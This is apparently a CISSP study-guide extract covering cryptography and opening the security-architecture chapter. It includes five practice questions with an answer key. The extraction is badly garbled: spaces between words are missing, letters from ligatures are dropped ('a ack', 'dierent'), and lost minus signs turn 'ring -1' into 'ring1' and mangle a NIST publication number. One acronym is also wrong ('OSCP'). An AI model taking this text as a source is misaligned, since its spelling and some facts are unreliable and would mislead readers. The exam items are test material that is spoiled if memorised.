DESistheDataEncryptionStandard,whichdescribestheDataEncryption
Algorithm(DEA).IBMdesignedDES,basedontheirolderLucifersymmetric
cipher.Itusesa64bitblocksize(meaningitencrypts64bitseachround)and
a56bitkey.

E x a m Wa r n i n g

EventhoughDESiscommonlyreferredtoasanalgorithm,DESis
technicallythenameofthepublishedstandardthatdescribesDEA.It
maysoundlikespli inghairs,butthatisanimportantdistinctiontokeep
inmindontheexam.DEAmaybethebestanswerforaquestion
regardingthealgorithmitself.

Modes of DES

DEScanusevedierentmodestoencryptdata.Themodesprimary
dierenceisblockversus(emulated)stream,theuseofinitializationvectors,
andwhethererrorsinencryptionwillpropagatetosubsequentblocks.

FastFacts
ThevemodesofDESare:
ElectronicCodeBook(ECB)
CipherBlockChaining(CBC)
CipherFeedback(CFB)
OutputFeedback(OFB)
CounterMode(CTR)

ECBistheoriginalmodeofDES.CBC,CFB,andOFBwerelateraddedin
FIPSPublication81(seeh p://www.itl.nist.gov/pspubs/p81.htm).CTR
modeisthenewestmode,describedinNISTSpecialPublication80038a(see
h p://csrc.nist.gov/publications/nistpubs/80038a/sp80038a.pdf).
Electronic Code Book

ElectronicCodeBook(ECB)isthesimplestandweakestformofDES.Ituses
noinitializationvectororchaining.Identicalplaintextswithidenticalkeys
encrypttoidenticalciphertexts.Twoplaintextswithpartialidenticalportions

(suchastheheaderofale er)encryptedwiththesamekeywillhavepartial
identicalciphertextportions.
Cipher Block Chaining

CipherBlockChaining(CBC)modeisablockmodeofDESthatXORsthe
previousencryptedblockofciphertexttothenextblockofplaintexttobe
encrypted.Therstencryptedblockisaninitializationvectorthatcontains
randomdata.Thischainingdestroyspa erns.OnelimitationofCBCmode
isthatencryptionerrorswillpropagate:anencryptionerrorinoneblockwill
cascadethroughsubsequentblocksduetothechaining,destroyingtheir
integrity.
Cipher Feedback

CipherFeedback(CFB)modeisverysimilartoCBC;theprimarydierenceis
CFBisastreammode.Itusesfeedback(thenameforchainingwhenusedin
streammodes)todestroypa erns.LikeCBC,CFBusesaninitialization
vectoranddestroyspa erns,anderrorspropagate.
Output Feedback

OutputFeedback(OFB)modediersfromCFBinthewayfeedbackis
accomplished.CFBusesthepreviousciphertextforfeedback.Theprevious
ciphertextisthesubkeyXORedtotheplaintext.OFBusesthesubkeybeforeit
isXORedtotheplaintext.Sincethesubkeyisnotaectedbyencryption
errors,errorswillnotpropagate.
Counter

Counter(CTR)modeislikeOFB;thedierenceagainisthefeedback:CTR
modeusesacounter.ThismodesharesthesameadvantagesasOFB(pa erns
aredestroyedanderrorsdonotpropagate)withanadditionaladvantage:
sincethefeedbackcanbeassimpleasanascendingnumber,CTRmode
encryptioncanbedoneinparallel.
Table5.2summarizesthevemodesofDES.

Table5.2
ModesofDESSummary

Single DES

SingleDESistheoriginalimplementationofDES,encrypting64bitblocksof
datawitha56bitkey,using16roundsofencryption.Theworkfactor
requiredtobreakDESwasreasonablein1976,butadvancesinCPUspeed
andparallelarchitecturehavemadeDESweaktoabruteforcekeya ack
today,whereeverypossiblekeyisgeneratedanda empted.
Triple DES

TripleDESappliessingleDESencryptionthreetimesperblock.Formally
calledtheTripleDataEncryptionAlgorithm(TDEA)andcommonlycalled
TDESor3DES,itbecamearecommendedstandardin1999.
Triple DES encryption order and keying options

TripleDESappliesDESencryptionthreetimesperblock.FIPS463describes
Encrypt,Decrypt,Encrypt(EDE)orderusingthreekeyingoptions:one,
two,orthreeuniquekeys(called1TDESEDE,2TDESEDE,and3TDESEDE,
respectively).
International Data Encryption Algorithm

TheInternationalDataEncryptionAlgorithmisasymmetricblockcipher
designedasaninternationalreplacementtoDES.TheIDEAalgorithmis
patentedinmanycountries.Itusesa128bitkeyand64bitblocksize.
Advanced Encryption Standard

TheAdvancedEncryptionStandard(AES)isthecurrentU.S.standard
symmetricblockcipher.AESuses128(with10roundsofencryption),192

(12roundsofencryption),or256bit(14roundsofencryption)keystoencrypt
128bitblocksofdata.
Choosing AES

TheU.S.NationalInstituteofStandardsandTechnology(NIST)solicited
inputonareplacementforDESintheFederalRegisterinJanuary1997.Fifteen
AEScandidateswereannouncedinAugust1998,andthelistwasreducedto
veinAugust1999.Table5.3liststheveAESnalists.
Table5.3
FiveAESFinalists

RijndaelwaschosenandbecameAES.AEShasfourfunctions:SubBytes,
ShiftRows,MixColumns,andAddRoundKey.
Blowfish and Twofish

BlowshandTwosharesymmetricblockcipherscreatedbyteamsledby
BruceSchneier,authorofAppliedCryptography.Blowshuses32through
448bit(thedefaultis128)keystoencrypt64bitsofdata.TwoshwasanAES
nalist,encrypting128bitblocksusing128through256bitkeys.Bothare
openalgorithms,unpatented,andfreelyavailable.
RC5 and RC6

RC5andRC6aresymmetricblockciphersbyRSALaboratories.RC5uses32
(testingpurposes),64(replacementforDES),or128bitblocks.Thekeysize
rangesfrom0to2040bits.
RC6wasanAESnalist.ItisbasedonRC5,alteredtomeettheAES
requirements.ItisalsostrongerthanRC5,encrypting128bitblocksusing
128,192,or256bitkeys.

ASYMMETRIC ENCRYPTION

ASYMMETRIC ENCRYPTION
Asymmetricencryptionusestwokeys:ifyouencryptwithonekey,youmay
decryptwiththeother.Onekeymaybemadepublic(calledthepublickey);
asymmetricencryptionisalsocalledpublickeyencryptionforthisreason.
Anyonewhowantstocommunicatewithyoumaysimplydownloadyour
publiclypostedpublickeyanduseittoencrypttheirplaintext.Once
encrypted,yourpublickeycannotdecrypttheplaintext:onlyyourprivatekey
candoso.Asthenameimplies,yourprivatekeymustbekeptprivateand
secure.
Additionally,anymessageencryptedwiththeprivatekeymaybedecrypted
withthepublickey.Thisistypicallyusedfordigitalsignatures,aswewillsee
shortly.
Asymmetric methods

Mathliesbehindtheasymmetricbreakthrough.Thesemethodsuseoneway
functions,whichareeasytocomputeonewayanddiculttocomputein
thereversedirection.
Factoring prime numbers

Anexampleofaonewayfunctionisfactoringacompositenumberintoits
primes.Multiplyingtheprimenumber6269bytheprimenumber7883
resultsinthecompositenumber49,418,527.Thatwayisquiteeasyto
compute,takingmillisecondsonacalculator.Answeringthequestionwhich
primenumbertimeswhichprimenumberequals49,418,527ismuchmore
dicult.Thatproblemiscalledfactoring,andnoshortcuthasbeenfoundfor
hundredsofyears.ThisisthebasisoftheRSAalgorithm.
Discrete logarithm

Alogarithmistheoppositeofexponentiation.Computing7thtothe13th
power(exponentiation)iseasyonamoderncalculator:96,889,010,407.Asking
thequestion96,889,010,407is7towhatpower(ndingthelogarithm)is
moredicult.Discretelogarithmsapplylogarithmstogroups,whichisa
muchharderproblemtosolve.ThisonewayfunctionisthebasisoftheDie
HellmanandElGamalasymmetricalgorithms.
Di ie-Hellman Key Agreement Protocol

Keyagreementallowstwopartiestosecurelyagreeonasymmetrickeyviaa

publicchannel,suchastheInternet,withnopriorkeyexchange.Ana acker
whoisabletosnitheentireconversationisunabletoderivetheexchanged
key.WhiteldDieandMartinHellmancreatedtheDieHellmanKey
AgreementProtocol(alsocalledtheDieHellmanKeyExchange)in1976.
DieHellmanusesdiscretelogarithmstoprovidesecurity.
Elliptic Curve Cryptography

ECCleveragesaonewayfunctionthatusesdiscretelogarithmsasappliedto
ellipticcurves.Solvingthisproblemisharderthansolvingdiscrete
logarithms,soalgorithmsbasedonEllipticCurveCryptography(ECC)are
muchstrongerperbitthansystemsusingdiscretelogarithms(andalso
strongerthanfactoringprimenumbers).ECCrequireslesscomputational
resourcesbecauseshorterkeyscanbeusedcomparedtootherasymmetric
methods.ECCisoftenusedinlowerpowerdevicesforthisreason.
Asymmetric and symmetric trade-o s

Asymmetricencryptionisfarslowerthansymmetricencryptionandisalso
weakerperbitofkeylength.Thestrengthofasymmetricencryptionisthe
abilitytosecurelycommunicatewithoutpresharingakey.

HASH FUNCTIONS
Ahashfunctionprovidesencryptionusinganalgorithmandnokey.Theyare
calledonewayhashfunctionsbecausethereisnowaytoreversethe
encryption.Avariablelengthplaintextishashedintoa(typically)xed
lengthhashvalue(oftencalledamessagedigestorsimplyahash).Hash
functionsareprimarilyusedtoprovideintegrity:ifthehashofaplaintext
changes,theplaintextitselfhaschanged.Commonolderhashfunctions
includeSecureHashAlgorithm1(SHA1),whichcreatesa160bithashand
MessageDigest5(MD5),whichcreatesa128bithash.Weaknesseshavebeen
foundinbothMD5andSHA1;neweralternativessuchasSHA2are
recommended.
MD5

MD5istheMessageDigestalgorithm5,createdbyRonaldRivest.Itisthe
mostwidelyusedoftheMDfamilyofhashalgorithms.MD5createsa128bit
hashvaluebasedonanyinputlength.MD5hasbeenquitepopularoverthe
years,butweaknesseshavebeendiscoveredwherecollisionscouldbefound
inapracticalamountoftime.MD6isthenewestversionoftheMDfamilyof

hashalgorithms,rstpublishedin2008.
Secure Hash Algorithm

SecureHashAlgorithmisthenameofaseriesofhashalgorithms.SHA1
createsa160bithashvalue.SHA2includesSHA224,SHA256,SHA384,
andSHA512,namedafterthelengthofthemessagedigesteachcreates.
HAVAL

HAVAL(HashofVariableLength)isahashalgorithmthatcreatesmessage
digestsof128,160,192,224,or256bitsinlength,using3,4,or5rounds.
HAVALusessomeofthedesignprinciplesbehindtheMDfamilyofhash
algorithmsandisfasterthanMD5.

CRYPTOGRAPHIC ATTACKS
Cryptographica acksareusedbycryptanalyststorecovertheplaintext
withoutthekey.Pleaserememberthatrecoveringthekey(sometimescalled
stealthekey)isusuallyeasierthanbreakingmodernencryption.Thisis
whatlawenforcementtypicallydoeswhenfacedwithasuspectusing
cryptography:theyobtainasearchwarrantanda empttorecoverthekey.
Brute force

Abruteforcea ackgeneratestheentirekeyspace,whichiseverypossible
key.Givenenoughtime,theplaintextwillberecovered.
Known plaintext

Aknownplaintexta ackreliesonrecoveringandanalyzingamatching
plaintextandciphertextpair:thegoalistoderivethekeythatwasused.You
maybewonderingwhyyouwouldneedthekeyifyoualreadyhavethe
plaintext:recoveringthekeywouldallowyoutodecryptotherciphertexts
encryptedwiththesamekey.
Chosen plaintext and adaptive-chosen plaintext

Acryptanalystchoosestheplaintexttobeencryptedinachosenplaintext
a ack;thegoalistoderivethekey.Encryptingwithoutknowingthekeyis
doneviaanencryptionoracleoradevicethatencryptswithoutrevealing
thekey.
Adaptivechosenplaintextbeginswithachosenplaintexta ackinround1.

Thecryptanalystthenadaptsfurtherroundsofencryptionbasedonthe
previousround.
Chosen ciphertext and adaptive-chosen ciphertext

Chosenciphertexta acksmirrorchosenplaintexta acks:thedierenceis

thatthecryptanalystchoosestheciphertexttobedecrypted.Thisa ackis
usuallylaunchedagainstasymmetriccryptosystems,wherethecryptanalyst
maychoosepublicdocumentstodecryptthataresigned(encrypted)witha
userspublickey.
Adaptivechosenciphertextalsomirrorsitsplaintextcousin:itbeginswitha
chosenciphertexta ackinround1.Thecryptanalystthenadaptsfurther
roundsofdecryptionbasedonthepreviousround.
Meet-in-the-middle attack

Ameetinthemiddlea ackencryptsononeside,decryptsontheotherside,
andmeetsinthemiddle.Themostcommona ackisagainstdoubleDES,
whichencryptswithtwokeysinencrypt,encryptorder.Thea ackisa
knownplaintexta ack:thea ackerhasacopyofamatchingplaintextand
ciphertextandseekstorecoverthetwokeysusedtoencrypt.
Known key

Thetermknownkeya ackismisleading:ifthecryptanalystknowsthe
key,thea ackisover.Knownkeymeansthecryptanalystknowssomething
aboutthekey,toreducetheeortsusedtoa ackit.Ifthecryptanalystknows
thatthekeyisanuppercasele erandanumberonly,othercharactersmay
beomi edinthea ack.
Di erential cryptanalysis

Dierentialcryptanalysisseekstondthedierencebetweenrelated
plaintextsthatareencrypted.Theplaintextsmaydierbyafewbits.Itis
usuallylaunchedasanadaptivechosenplaintexta ack:thea ackerchooses
theplaintexttobeencrypted(butdoesnotknowthekey)andthenencrypts
relatedplaintexts.
Linear cryptanalysis

Linearcryptanalysisisaknownplaintexta ackwherethecryptanalystnds
largeamountsofplaintext/ciphertextpairscreatedwiththesamekey.The

pairsarestudiedtoderiveinformationaboutthekeyusedtocreatethem.
Bothdierentialandlinearanalysescanbecombinedasdierentiallinear
analysis.
Side-channel attacks

Sidechannela acksusephysicaldatatobreakacryptosystem,suchas
monitoringCPUcyclesorpowerconsumptionusedwhileencryptingor
decrypting.

IMPLEMENTING CRYPTOGRAPHY
Symmetric,asymmetric,andhashbasedcryptographydonotexistina
vacuum:theyareappliedintherealworld,oftenincombination,toprovide
condentiality,integrity,authentication,andnonrepudiation.
Digital signatures

Digitalsignaturesareusedtocryptographicallysigndocuments.Digital
signaturesprovidenonrepudiation,whichincludesauthenticationofthe
identityofthesigner,andproofofthedocumentsintegrity(provingthe
documentdidnotchange).Thismeansthesendercannotlaterdeny(or
repudiate)signingthedocument.
RoywantstosendadigitallysignedemailtoRick.Roywritestheemail,
whichistheplaintext.HethenusestheSHA1hashfunctiontogeneratea
hashvalueoftheplaintext.Hethencreatesthedigitalsignatureby
encryptingthehashwithhisRSAprivatekey.Figure5.1showsthisprocess.
Roythena achesthesignaturetohisplaintextemailandhitssend.

FIGURE5.1 Creatingadigitalsignature.

RickreceivesRoysemailandgenerateshisownSHA1hashvalueofthe
plaintextemail.RickthendecryptsthedigitalsignaturewithRoysRSA
publickey,recoveringtheSHA1hashRoygenerated.Rickthencompareshis
SHA1hashwithRoys.Figure5.2showsthisprocess.

FIGURE5.2 Verifyingadigitalsignature.

Ifthetwohashesmatch,Rickknowsanumberofthings:
1.Roymusthavesenttheemail(onlyRoyknowshisprivatekey).This
authenticatesRoyasthesender.
2.Theemaildidnotchange.Thisprovestheintegrityoftheemail.
Ifthehashesmatch,Roycannotlaterdenyhavingsignedtheemail.Thisis
nonrepudiation.Ifthehashesdonotmatch,RickknowseitherRoydidnot
senditorthattheemailsintegritywasviolated.
Public Key Infrastructure

PublicKeyInfrastructure(PKI)leveragesallthreeformsofencryptionto
provideandmanagedigitalcerticates.Adigitalcerticateisapublickey
signedwithadigitalsignature.Digitalcerticatesmaybeserverbasedor
clientbased.Ifthetwoareusedtogether,theyprovidemutualauthentication
andencryption.ThestandarddigitalcerticateformatisX.509.
Certificate Authorities and Organizational Registration Authorities

DigitalcerticatesareissuedbyCerticateAuthorities(CAs).Organizational
RegistrationAuthorities(ORAs)authenticatetheidentityofacerticate
holderbeforeissuingacerticatetothem.AnorganizationmayactasaCA
orORA(orboth).
Certificate Revocation Lists

TheCerticationAuthoritiesmaintainCerticateRevocationLists(CRL),which,
asthenameimplies,listcerticatesthathavebeenrevoked.Acerticatemay
berevokediftheprivatekeyhasbeenstolen,anemployeeisterminated,etc.
ACRLisaatleanddoesnotscalewell.TheOnlineCerticateStatus
Protocol(OSCP)isareplacementforCRLsandusesclientserverdesignthat

scalesbe er.
Key management issues

CerticateAuthoritiesissuedigitalcerticatesanddistributethemto
certicateholders.Thecondentialityandintegrityoftheholdersprivatekey
mustbeassuredduringthedistributionprocess.
Public/privatekeypairsusedinPKIshouldbestoredcentrally(andsecurely).
Usersmaylosetheirprivatekeyaseasilyastheymayforgettheirpassword.
Alostprivatekeythatisnotsecurelystoredmeansthatanythingencrypted
withthematchingpublickeywillbelost(shortofcryptanalysisdescribed
previously).
Notethatkeystorageisdierentthankeyescrow.Keystoragemeansthe
organizationthatissuedthepublic/privatekeypairsretainsacopy.Key
escrow,aswewilldiscussshortly,meansacopyisretainedbyathirdparty
organization(andsometimesmultipleorganizations),oftenforlaw
enforcementpurposes.
Aretiredkeymaynotbeusedfornewtransactions,butmaybeusedto
decryptpreviouslyencryptedplaintexts.Adestroyedkeynolongerexists
andcannotbeusedforanypurpose.
SSL and TLS

SecureSocketsLayer(SSL)broughtthepowerofPKItotheWeb.SSL
authenticatesandprovidescondentialitytoWebtrac.TransportLayer
Security(TLS)isthesuccessortoSSL.Theyarecommonlyusedaspartof
HTTPS(HypertextTransferProtocolSecure).
SSLwasdevelopedfortheNetscapeWebbrowserinthe1990s.SSL2.0was
therstreleasedversion;SSL3.0xedanumberofsecurityissueswith
version2.TLSwasbasedonSSL3.0.TLSisverysimilartothatversion,with
somesecurityimprovements.AlthoughtypicallyusedforHTTPStosecure
Webtrac,TLSmaybeusedforotherapplicationssuchasInternetchatand
emailservertoserverorclientaccess.
IPsec

IPsec(InternetProtocolSecurity)isasuiteofprotocolsthatprovidea
cryptographiclayertobothIPv4andIPv6.Itisoneofthemethodsusedto

provideVirtualPrivateNetworks(VPN),whichallowyoutosendprivatedata
overaninsecurenetwork,suchastheInternet(thedatacrossesapublic
networkbutisvirtuallyprivate).IPsecincludestwoprimaryprotocols:
AuthenticationHeader(AH)andEncapsulatingSecurityPayload(ESP).AHand
ESPprovidedierentandsometimesoverlappingfunctionalities.
SupportingIPsecprotocolsincludeInternetSecurityAssociationandKey
ManagementProtocol(ISAKMP)andInternetKeyExchange(IKE).
AH and ESP

AuthenticationHeaderprovidesauthenticationandintegrityforeachpacket
ofnetworkdata.AHprovidesnocondentiality;itactsasadigitalsignature
forthepacket.AHalsoprotectsagainstreplaya acks,wheredataissniedo
anetworkandresent,ofteninana empttofraudulentlyreuseencrypted
authenticationcredentials.
EncapsulatingSecurityPayloadprimarilyprovidescondentialityby
encryptingpacketdata.Itmayalsooptionallyprovideauthenticationand
integrity.
Security association and ISAKMP

AHandESPmaybeusedseparatelyorincombination.AnIPsecSecurity
Association(SA)isasimplex(oneway)connection,whichmaybeusedto
negotiateESPorAHparameters.IftwosystemscommunicateviaESP,they
usetwoSAs(oneforeachdirection).IfthesystemsleverageAHinaddition
toESP,theyusetwomoreSAs,foratotaloffour.Aunique32bitnumber
calledtheSecurityParameterIndex(SPI)identieseachsimplexSA
connection.TheInternetSecurityAssociationandKeyManagementProtocol
(ISAKMP)managestheSAcreationprocess.
Tunnel and transport mode

IPseccanbeusedintunnelmodeortransportmode.Tunnelmodeisusedby
securitygateways(whichcanprovidepointtopointIPsectunnels).ESP
tunnelmodeencryptstheentirepacket,includingtheoriginalpacketheaders.
ESPtransportmodeonlyencryptsthedata(andnottheoriginalheaders);this
iscommonlyusedwhenthesendingandreceivingsystemcanspeakIPsec
natively.

CrunchTime
AHauthenticatestheoriginalIPheaders,soitisoftenused(alongwith
ESP)intransportmodebecausetheoriginalheadersarenotencrypted.
TunnelmodetypicallyusesESPalone(theoriginalheadersareencrypted,
andthusprotected,byESP).

IKE

IPseccanuseavarietyofencryptionalgorithms,suchasMD5orSHA1for
integrityandtripleDESorAESforcondentiality.TheInternetKey
Exchangenegotiatesthealgorithmselectionprocess.TwosidesofanIPsec
tunnelwilltypicallyuseIKEtonegotiatetothehighestandfastestlevelof
security,selectingAESoversingleDESforcondentialityifbothsides
supportAES,forexample.
PGP

Pre yGoodPrivacy(PGP),createdbyPhilZimmermannin1991,brought
asymmetricencryptiontothemasses.PGPprovidesthemodernsuiteof
cryptography:condentiality,integrity,authentication,andnonrepudiation.
Itcanbeusedtoencryptemails,documents,oranentirediskdrive.PGP
usesaWeboftrustmodeltoauthenticatedigitalcerticates,insteadofrelying
onacentralCerticateAuthority(CA).
S/MIME

MIME(MultipurposeInternetMailExtensions)providesastandardwayto
formatemail,includingcharacters,sets,anda achments.S/MIME
(Secure/MIME)leveragesPKItoencryptandauthenticateMIMEencodede
mail.Theclientorclientsemailserver(calledanS/MIMEgateway)may
performtheencryption.
Escrowed encryption

Escrowedencryptionmeansathirdpartyorganizationholdsacopyofa
public/privatekeypair.Theprivatekeyisoftendividedintotwoormore
parts,eachheldinescrowbydierenttrustedthirdpartyorganizations,
whichwillonlyreleasetheirportionofthekeywithproperauthorization,
suchasacourtorder.Thisprovidesseparationofduties.
Clipper Chip

Clipper Chip

TheClipperChipwasthenamethetechnologyusedintheEscrowed
EncryptionStandard(EES),aneortannouncedin1993bytheU.S.
Governmenttodeployescrowedencryptionintelecommunicationsdevices.
Theeortcreatedamediarestormandwasabandonedby1996.TheClipper
ChipusedtheSkipjackalgorithm,asymmetriccipherthatusesan80bitkey.
Thealgorithmwasoriginallyclassiedassecret.

Summary of exam objectives

Cryptographydatestoancienttimesbutisverymuchapartofourmodern
world,providingsecurityfordatainmotionandatrest.Modernsystems
suchasPublicKeyInfrastructureputallthecryptographicpiecesintoplay
viatheuseofsymmetric,asymmetric,andhashbasedencryptiontoprovide
condentiality,integrity,authentication,andnonrepudiation.Youhave
learnedhowthepiecesttogether:slowerandweakerasymmetricciphers
suchasRSAandDieHellmanareusedtoexchangefasterandstronger
symmetrickeyssuchasAESandDES.Thesymmetrickeysareusedas
sessionkeystoencryptshorttermsessions,suchasWebconnectionsvia
HTTPS.Digitalsignaturesemploypublickeyencryptionandhashalgorithms
suchasMD5andSHA1toprovidenonrepudiation,authenticationofthe
sender,andintegrityofthemessage.

TOP FIVE TOUGHEST QUESTIONS

1.Whichalgorithmshouldyouuseforalowpowerdevicethatmustemploy
digitalsignatures?
A.AES
B.RSA
C.ECC
D.ElGamal
2.Whattypeofcryptanalysisisprimarilyusedagainstasymmetric
encryption?
A.Dierentialcryptanalysis

B.Chosenplaintext
C.Chosenciphertext
D.Linearcryptanalysis
3.Whichofthefollowinga acksanalyzeslargeamountsof
plaintext/ciphertextpairscreatedwiththesamekey?
A.Knownplaintext
B.Dierentialcryptanalysis
C.Linearcryptanalysis
D.Chosenplaintext
4.Whichofthefollowingistruefordigitalsignatures?
A.Thesenderencryptsthehashwithapublickey
B.Thesenderencryptsthehashwithaprivatekey
C.Thesenderencryptstheplaintextwithapublickey
D.Thesenderencryptstheplaintextwithaprivatekey
5.WhichofthefollowingwasnotanAESnalist?
A.MARS
B.RC6
C.Serpent
D.Blowsh

ANSWERS
1.Correctanswerandexplanation:C.AnswerCiscorrect;digitalsignatures
requireasymmetricencryption.ECCisthestrongestasymmetricalgorithm
perbitofkeylength.ThisallowsshorterkeylengthsthatrequirelessCPU

resources.
Incorrectanswersandexplanations:A,B,andD.AnswersA,B,andDare
incorrect.AESisasymmetriccipher;symmetricciphersarenotusedin
digitalsignatures.RSAisbasedonfactoringcompositenumbersintotheir
primes,andElGamalisbasedondiscretelogarithms.Bothmethodsprovide
roughlythesamestrengthperbitandarefarweakerperbitthanECC.
2.Correctanswerandexplanation:C.AnswerCiscorrect;chosenciphertext
a acksareusuallylaunchedagainstasymmetriccryptosystems,wherethe
cryptanalystmaychoosepublicdocumentstodecryptthataresigned
(encrypted)withauserspublickey.
Incorrectanswersandexplanations:A,B,andD.AnswersA,B,andDare
incorrect.Noneoftheseareprimarilyusedagainstasymmetricencryption.
3.Correctanswerandexplanation:C.AnswerCiscorrect;linear
cryptanalysisanalyzeslargeamountsofplaintext/ciphertextpairscreated
withthesamekey,tryingtodeduceinformationaboutthekey.
Incorrectanswersandexplanations:A,B,andD.AnswersA,B,andDare
incorrect.Linearcryptanalysisisaknownplaintexta ack,butthequestion
referenceslinearspecically,makingknownplaintexta ackincorrect.
Dierentialcryptanalysisseekstondthedierencebetweenrelated
plaintextsthatareencrypted.Acryptanalystchoosestheplaintexttobe
encryptedduringachosenplaintexta ack.
4.Correctanswerandexplanation:B.AnswerBiscorrect;thesender
generatesahashoftheplaintextandencryptsthehashwithaprivatekey.
Therecipientdecryptsthehashwithapublickey.
Incorrectanswersandexplanations:A,C,andD.AnswersA,C,andDare
incorrect.Thesenderencryptsthehashwiththeprivatekey,notpublic.The
plaintextishashedandnotencrypted.
5.Correctanswerandexplanation:D.AnswerDiscorrect;Blowshwasnot
anAESnalist(Twosh,basedonBlowsh,was).
Incorrectanswersandexplanations:A,B,andC.AnswersA,B,andCare
incorrect.MARS,RC6,andSerpentwereallAESnalists.
2

Sco R.Bladerunner.WarnerBros;1982.

SchneierB.AppliedCryptography.NewYork,NY:Wiley;1996.

CHAPTER6

Domain 6: Security Architecture a

nd Design
Abstract
Inordertosecureanetworkorsystem,abasicunderstandingofthelowlevel
aspectsofsystemsmustbeachieved.ThischapterisdedicatedtoDomain6:
SecurityArchitectureandDesign,whichdetailslowlevelaspectsof
operatingsystemsandhardwareastheyrelatetosecurity.Keydesign
principlessuchaslayering,abstraction,theconceptofsecuritydomains,and
theringmodelarchitecturearediscussed.Familiaritywiththeoperationofa
CPUandmemoryaddressingandprotectionoftheOSviatheTrusted
ComputingBase(TCB)andkernelisalsorequiredforsuccesswiththis
domain.Formsofdistributedcomputingsuchascloud,grid,andpeerto
peerarealsoatopicwithinthischapter.CerticationandAccreditationinthe
formoftheOrangeBook,ITSEC,andCommonCriteriaarediscussed.
Finally,commonvulnerabilitiesanda acksincludingrecentcontenton
mobiledevicea acksandWebapplicationa acksarealsofoundinDomain
6.

KEYWORDS
BellLapadula;CerticationandAccreditation;Hypervisor;Memory(RAM);
Referencemonitor;ReadOnlyMemory(ROM);TrustedComputerSystem
EvaluationCriteria(TCSEC);Virtualization

Exam Objectives in This Chapter

SecureSystemDesignConcepts
SecureHardwareArchitecture

SecureOperatingSystemandSoftwareArchitecture
VirtualizationandDistributedComputing
SystemVulnerabilities,Threats,andCountermeasures
SecurityModels
EvaluationMethods,Certication,andAccreditation

Introduction
SecurityArchitectureandDesigndescribesfundamentallogicalhardware,
operatingsystem,andsoftwaresecuritycomponentsandhowtousethose
componentstodesign,architect,andevaluatesecurecomputersystems.
Understandingthesefundamentalissuesiscriticalforaninformationsecurity
professional.
SecurityArchitectureandDesignisathreepartdomain.Therstpartcovers
thehardwareandsoftwarerequiredtohaveasecurecomputersystem.The
secondpartcoversthelogicalmodelsrequiredtokeepthesystemsecure,and
thethirdpartcoversevaluationmodelsthatquantifyhowsecurethesystem
reallyis.

SECURE SYSTEM DESIGN CONCEPTS

Securesystemdesigntranscendsspecichardwareandsoftware
implementationsandrepresentsuniversalbestpractices.
Layering

Layeringseparateshardwareandsoftwarefunctionalityintomodulartiers.
Thecomplexityofanissuesuchasreadingasectorfromadiskdriveis
containedtoonelayer(thehardwarelayerinthiscase).Onelayer(suchasthe
applicationlayer)isnotdirectlyaectedbyachangetoanother.

FastFacts
Agenericlistofsecurityarchitecturelayersisasfollows:

1.Hardware
2.Kernelanddevicedrivers
3.Operatingsystem
4.Applications

Abstraction

Abstractionhidesunnecessarydetailsfromtheuser.Complexityistheenemy
ofsecurity:themorecomplexaprocessis,thelesssecureitis.Thatsaid,
computersaretremendouslycomplexmachines.Abstractionprovidesaway
tomanagethatcomplexity.
Security domains

Asecuritydomainisthelistofobjectsasubjectisallowedtoaccess.More
broadlydened,domainsaregroupsofsubjectsandobjectswithsimilar
securityrequirements.Condential,Secret,andTopSecretarethreesecurity
domainsusedbytheU.S.DepartmentofDefense(DoD),forexample.
The ring model

TheringmodelisaformofCPUhardwarelayeringthatseparatesandprotects
domains(suchaskernelmodeandusermode)fromeachother.ManyCPUs,
suchastheIntelx86family,havefourrings,rangingfromring0(kernel)to
ring3(user),showninFigure6.1.Theinnermostringisthemosttrusted,and
eachsuccessiveouterringislesstrusted.

FIGURE6.1 Theringmodel.

Processescommunicatebetweentheringsviasystemcalls,whichallow
processestocommunicatewiththekernelandprovideawindowbetween
therings.

FastFacts
Theringsare(theoretically)usedasfollows:
Ring0:Kernel
Ring1:OtherOScomponentsthatdonottintoring0
Ring2:Devicedrivers
Ring3:Userapplications

Whilex86CPUshavefourringsandcanbeusedasdescribedabove,this
usageisconsideredtheoreticalbecausemostx86operatingsystems,
includingLinuxandWindows,userings0and3only.Anewmodecalled
hypervisormode(andinformallycalledring1)allowsvirtualgueststo
operateinring0,controlledbythehypervisoroneringbelow.TheIntelVT
(IntelVirtualizationTechnology,akaVanderpool)andAMDV(AMD

Virtualization,akaPacica)CPUssupportahypervisor.

SECURE HARDWARE ARCHITECTURE

SecureHardwareArchitecturefocusesonthephysicalcomputerhardware
requiredtohaveasecuresystem.Thehardwaremustprovidecondentiality,
integrity,andavailabilityforprocesses,data,andusers.
The system unit and motherboard

Thesystemunitisthecomputerscase:itcontainsalloftheinternalelectronic
computercomponents,includingthemotherboard,internaldiskdrives,and
powersupply.ThemotherboardcontainshardwareincludingtheCPU,
memoryslots,rmware,andperipheralslotssuchasPCI(Peripheral
ComponentInterconnect)slots.Thekeyboardunitistheexternalkeyboard.
The computer bus

Acomputerbus,showninFigure6.2,istheprimarycommunicationchannel
onacomputersystem.CommunicationbetweentheCPU,memory,and
input/outputdevicessuchaskeyboard,mouse,display,etc.,occursviathe
bus.

FIGURE6.2 Simpliedcomputerbus.

The CPU

TheCentralProcessingUnit(CPU)isthebrainsofthecomputer,capableof
controllingandperformingmathematicalcalculations.Ultimately,everything
acomputerdoesismathematical:addingnumbers(whichcanbeextendedto
subtraction,multiplication,division,etc.),performinglogicaloperations,
accessingmemorylocationsbyaddress,etc.CPUsareratedbythenumberof
clockcyclespersecond.A2.4GHzPentium4CPUhas2.4billionclockcycles

persecond.
Arithmetic logic unit and control unit

Thearithmeticlogicunit(ALU)performsmathematicalcalculations:it
computes.Itisfedinstructionsbythecontrolunit,whichactsasatrac
cop,sendinginstructionstotheALU.
Fetch and execute

CPUsfetchmachinelanguageinstructions(suchasadd1+1)andexecute
them(addthenumbers,foranswerof2).Thefetchandexecute(alsocalled
Fetch,Decode,Execute,orFDX)processactuallytakesfoursteps:
1.Fetchinstruction1
2.Decodeinstruction1
3.Executeinstruction1
4.Write(save)result1
Thesefourstepstakeoneclockcycletocomplete.
Pipelining

Pipeliningcombinesmultiplestepsintoonecombinedprocess,allowing
simultaneousfetch,decode,execute,andwritestepsfordierentinstructions.
Eachpartiscalledapipelinestage;thepipelinedepthisthenumberof
simultaneousstagesthatmaybecompletedatonce.
Givenourpreviousfetchandexecuteexampleofadding1+1,aCPUwithout
pipeliningwouldhavetowaitanentirecyclebeforeperforminganother
computation.Afourstagepipelinecancombinethestagesoffourother
instructions:
1.Fetchinstruction1
2.Fetchinstruction2,decodeinstruction1
3.Fetchinstruction3,decodeinstruction2,executeinstruction1
4.Fetchinstruction4,decodeinstruction3,executeinstruction2,write(save)

result1
